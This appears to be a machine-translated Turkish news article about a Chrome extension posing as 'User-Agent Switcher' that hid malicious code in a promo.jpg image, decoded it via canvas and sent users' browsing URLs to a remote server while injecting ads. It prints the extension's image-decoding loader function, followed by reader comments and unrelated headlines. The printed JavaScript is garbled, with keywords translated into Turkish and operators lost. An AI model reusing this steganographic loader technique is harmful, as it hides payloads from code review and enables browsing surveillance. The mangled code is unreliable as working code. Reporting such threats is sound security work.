Hızlı bir şekilde kaldırın! User-Agent Switcher'ın en iyi eklentisi için Chrome araması aslında bir Truva atıdır

Kısa bir süre önce bir geliştirici, Google Chrome mağazasında Kullanıcı-Aracı Değiştirici'yi (https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake) aradığında, bu uzantıyı Google Chrome mağazasında bulmuşlardır. Bir numaralı "User-Agent Switcher" (459.604 kullanıcı), "google.com" yerine "useragentswitcher.org" tarafından sağlanan kötü amaçlı bir programdır.

Bu Google Chrome için Kullanıcı-Aracı Değiştirici sayfasındaki "Kötüye Kullanımı Bildir", aslında yararlı olmayan bir .jpg dosyası gibi görünen işe yaramaz bir bağlantıdır. Aslında, Chromeun denetim politikasını atlamak için yazar, kötü amaçlı kodu promo.jpg dosyasında gizler. Canvas öğesine yüklendiğinde ve bir şekilde kodu çözüldüğünde, tüm kullanıcı isteklerini gönderecek olan JS oluşturulur. Belirli bir etki alanına, reklamları da enjekte edecek ve bağlı kuruluş bağlantılarına yönlendirecektir.

Geliştirici @anoymoux, bu resimdeki kötü amaçlı kodun şifresini çözdü ve çalıştırdı:

t.prototype.Vh = function (t, e) {

eğer ("" === '.. / promo.jpg') "" döndür;

void 0 === t (t = '.. / promo.jpg'), t.length (t = r.Wk (t)), e = e || {};

var n = this.ET,

i = e.mp || n.mp,

o = e.Tv || n.Tv,

h = e.At || n.At,

a = r.Yb (Math.pow (2, i)),

f = (e.WC || n.WC, e.TY || n.TY),

u = document.createElement ("canvas"),

p = u.getContext ("2d");

eğer (u.style.display = "yok", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 == = u.height) dönüş "";

e.height e.widthp.drawImage (t, 0, 0, e.width, e.height): p.drawImage (t, 0, 0);

var c = p.getImageData (0, 0, u.width, u.height),

d = c.data,

g =;

eğer (c.data.every (function (t) {

dönüş 0 === t

})) dönüş "";

var m, s;

eğer (1 === o)

için (m = 3, s =! 1;! s m < d. uzunluk! s; m + = 4) s = f (d, m, o), s || g.push (d- (255-a + 1));

var v = "",

w = 0,

y = 0,

l = Math.pow (2, h) -1;

için (m = 0; m < g. uzunluk; m + = 1) w + = g < < y, y + = i, y > = h (v + = String.fromCharCode (w ve l), y% = h, w = g > > i-y);

dönüş / uzunluk < 13? "": (0! == w (v + = String.fromCharCode (w ve l)), v)

}

Programı çalıştırdıktan sonra, kullanıcı tarafından açılan her sekmenin url ve diğer bilgilerinin şifrelenerek https://uaswitcher.org/logic/page/data adresine gönderileceği tespit edilmiştir.

Ayrıca, promosyon bağlantılarının kuralları adresinden alınacaktır. Kurallara uyan bir web sitesi açıldığında, reklamlar ve hatta kötü niyetli kod sayfaya eklenecektir.

Bu bağlamda, birçok netizen kendi fikirlerine sahiptir:

  • gorhill: "Google Chrome için Kullanıcı-Aracı Değiştirici", uzantı listesinde "güvenli olmayan-eval" CSP talimatı içeren bir "content_security_policy" değerine sahiptir ve özü, genişletilmiş bağlamda rastgele kod yürütmektir. Yetenek, kod incelemesi orijinal dosyayı okuyarak gerçekleştirilemez. Bu nedenle, listede belirtilen bu CSP talimatının herhangi bir uzantısının kötü niyetli bir program olduğu varsayılacaktır, bu nedenle spesifik olanı doğrulamak için daha fazla araştırma yapılması gerekir.

  • horsawlarway: Birçok kitaplık ve şablon artık eval kodunu kullanır. Bilinen ve güvenilir konumlardan güncelleme ve modüller alınması durumunda, eval kullanmak için geçerli nedenler olan bazıları (anahtar kelime: FEW) vardır. Bu durumlarda, kullanıcı uzantıdaki önceden paylaşılan sertifikayı sunucuyu imzalamak ve imzayı doğrulamak için kullanmazsa, o zaman sorunlar olacaktır. Uzun lafın kısası, eval hala çok kullanışlı bir özelliktir, ancak doğru ve tutumlu kullanılması gerekir.

  • krisgenre: Aman tanrım, bu uzantıyı kullanıyorum! Hemen silin ve Chrome mağazasında bir yedek arayın ve daha sonra Google'ın kendisi tarafından sağlanan uzantının yüklenmesi gerektiğini öğrenin.

  • milankragujevic: Çok üzüldüm, bu uzantıyı iki yıldır yükledim, hangi bilgileri alacaklar ve benimle ne yapacaklar? Şimdi kaldırdım.

  • krackers: Öğrendiğimde aynı endişelerim vardı. Tamamen kodunu çözmek için yeterli beceriye sahip değilim, ancak en azından tarama geçmişi göndereceğini ve reklamları enjekte edeceğini biliyorum. Şimdi güvenlik açısından çeşitli şifreleri değiştirdim.

Bu eklenti kurulursa, bilgisayar korsanlarının gözetimi altında olmaya eşdeğerdir, bu nedenle dikkatlice düşünmek son derece korkutucu olur.

-------- Sıcak haber incelemesi --------

Otobüs tasarımındaki yenilikler daha kolay ve daha akıllı hale geliyor Bu tasarım harika
önceki
Eve dönmüş olan sizler, Bahar Şenliği seyahati başlar. Ayrılmadan önce bunları bilmelisiniz
Sonraki
"Aquaman" neden 8,3 puan alıyor? Sualtı dünyası muhteşem ve büyülü ve bazı lensler tanıdık geliyor
Günlük limit, ticaretin ilk günüdür! Bugün, Qingdao Limanı A-hisse listesine geri dönüyor!
TIOBE Eylül programlama dili sıralaması Java, C, C ++ dünya kapandığında üç puan
Biz farkına varmadan sosyal medyada "seçme hakkına" bile sahip değildik.
Her gün milyonlarca mühendis kazananlar
Hengdian aşağı ceket tasarım yarışması başladı, bu yılın sıcak stili Yiyang Qianxi'den geliyor
Qingdao'nun en güzel yolcusu onu buldu, yaşlılar için ayakkabı bağını bağlamak için eğildi ve herkesi hareket ettirdi.
Google nihayet 2 milyar Android cihazının yüksek performanslı AR oynamasına izin vermek üzere
Tmall süpermarket hızlandırmak için çift 11 ödünç alıyor! Aç mısınız ve sekiz büyük şehri desteklemek için 1 saatte teslim ediyor musunuz
Çoğu otomobil sahibinin yaptığı hatalar nelerdir ve bir arabayı tutmanın üretken olmayan işlemleri nelerdir?
Baş mimarın gözünde mimari ve mimarın büyümesi
Çok pratik Linux komut satırı becerileri

Copyleft gutx

To Top